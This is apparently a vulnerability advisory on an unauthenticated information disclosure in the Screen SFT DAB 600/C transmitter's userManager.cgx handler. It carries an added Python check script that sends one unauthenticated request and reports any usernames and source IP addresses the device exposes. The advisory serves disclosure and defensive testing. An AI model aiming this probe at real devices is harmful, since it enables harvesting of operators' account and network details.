Title: Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)
Advisory ID: ZSL-2023-5776
Type: Local/Remote
Impact: Spoofing, Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 13.05.2023
Summary
Screen's new radio DAB transmitter is reaching the highest technology level in both the Digital Signal Processing and RF domains. SFT DAB Series – Compact Radio DAB Transmitter – Air. Thanks to the digital adaptive precorrection and configuration flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support the DAB, DAB+ and T-DMB standards and are compatible with major headend brands.
Description
The Screen SFT DAB 600/C is affected by an information disclosure vulnerability due to improper access control enforcement on the userManager.cgx handler. An unauthenticated remote attacker can exploit this, via a request to that handler, to gain access to sensitive information including usernames and source IP addresses.
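The following check script is an added example written for this page; it is not the advisory's own screen_info.py PoC. It sends a single unauthenticated GET and reports whether the handler answers with data instead of a login redirect or an authentication error. Everything beyond what the advisory states is an assumption: that the handler is served at /userManager.cgx on the web root, that a plain GET without cookies is sufficient, and that a disclosing response is an HTTP 200 whose body contains dotted-quad source IP addresses (the advisory does not document the response format, so the sample body below is constructed for the test, not captured from a device).

```python
"""Unauthenticated exposure check for the userManager.cgx handler
(ZSL-2023-5776).  Added example, not the advisory's PoC.

Assumptions not stated in the advisory:
  * the handler is reachable at <base_url>/userManager.cgx
  * an unauthenticated GET (no cookies, no Authorization header) is enough
  * a disclosing response is HTTP 200 with dotted-quad IPv4 addresses in the body
"""
import re
import sys
import urllib.error
import urllib.request

ENDPOINT = "/userManager.cgx"  # assumed path, taken from the advisory title

# Strict dotted-quad matcher (each octet 0-255).
IPV4_RE = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"
)

# Constructed sample body used for offline testing; the real response
# format of the device is not documented in the advisory.
SAMPLE_BODY = "user=admin src=192.168.10.25\nuser=operator src=10.0.0.7\n"


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a login bounce is visible as 3xx."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def extract_ipv4(body: str) -> list:
    """Unique IPv4 addresses found in a response body, sorted."""
    return sorted(set(IPV4_RE.findall(body)))


def classify(status: int, body: str) -> str:
    """Map an unauthenticated response to 'exposed', 'protected' or 'inconclusive'.

    A redirect to a login page or an explicit 401/403 means access control
    fired.  A 200 whose body carries source IP addresses matches the
    disclosure the advisory describes.  Anything else needs a human look.
    """
    if status in (301, 302, 303, 307, 308, 401, 403):
        return "protected"
    if status == 200 and extract_ipv4(body):
        return "exposed"
    return "inconclusive"


def fetch(base_url: str, timeout: float = 10.0):
    """Issue the unauthenticated GET and return (status, body)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + ENDPOINT,
        headers={"User-Agent": "zsl-2023-5776-check"},
    )
    opener = urllib.request.build_opener(NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 3xx (because redirects are refused) and 4xx/5xx land here.
        return err.code, err.read().decode("utf-8", "replace")


def main(argv):
    if len(argv) != 2:
        print("usage: userManager_check.py http://<transmitter-ip>", file=sys.stderr)
        return 2
    status, body = fetch(argv[1])
    verdict = classify(status, body)
    print(f"HTTP {status}: {verdict}")
    if verdict == "exposed":
        print("source IPs in response:", ", ".join(extract_ipv4(body)))
    return 0 if verdict == "protected" else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a lab device only; it makes exactly one request and sends no credentials, so a "protected" verdict on a patched or differently configured unit means the handler now enforces a session, while "inconclusive" (for example a 200 with no addresses) should be inspected by hand rather than treated as safe.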
Vendor
DB Elettronica Telecomunicazioni SpA – https://www.screen.it | https://www.dbbroadcast.com
Affected Version
Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Tested On
Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vendor Status
[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.
PoC
screen_info.py
Credits
Vulnerability discovered by Gjoko Krstic – <gjoko@zeroscience.mk>
References
N/A
Changelog
[13.05.2023] – Initial release
Contact
Zero Science Lab
Web: https://www.zeroscience.mk
e-mail: lab@zeroscience.mk
Source: www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php